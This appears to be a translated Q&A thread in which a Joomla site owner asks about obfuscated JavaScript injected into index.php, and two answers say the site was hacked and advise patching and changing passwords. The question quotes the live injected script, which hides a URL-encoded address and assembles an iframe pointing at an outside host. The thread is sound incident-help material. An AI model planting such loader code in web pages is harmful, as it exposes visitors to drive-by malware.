0

我已经看到,在我的根 index.php 文件中,这种情况发生了两次。我添加了这个东西

<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html>

有谁知道那是什么以及它是如何产生的。

当我试图在谷歌浏览器中打开我的网站时,它告诉我一些恶意软件正试图从有害网站运行,你要允许吗?

如何删除该脚本后一切正常

但这在 2 周内发生了两次

难道是病毒。怎么可能改变我的代码

我正在使用 JOOMLA

4

2 回答 2

0

您的网站已被黑客入侵。您需要确保您的 Joomla 安装、其所有插件以及服务器上的所有其他软件都已修补到最新版本。如果它是共享服务器,您的主机可能会提供帮助。否则,请查阅您的服务器日志。

于 2010-06-07T00:43:49.223 回答
0

你已经被黑客入侵。您应该更改您的 FTP 和 MYSQL 密码,升级到最新版本的 Joomla(当前为 1.5.18)并检查您的所有组件和插件是否存在此列表中的漏洞http://docs.joomla.org/Vulnerable_Extensions_List

于 2010-06-07T08:46:59.787 回答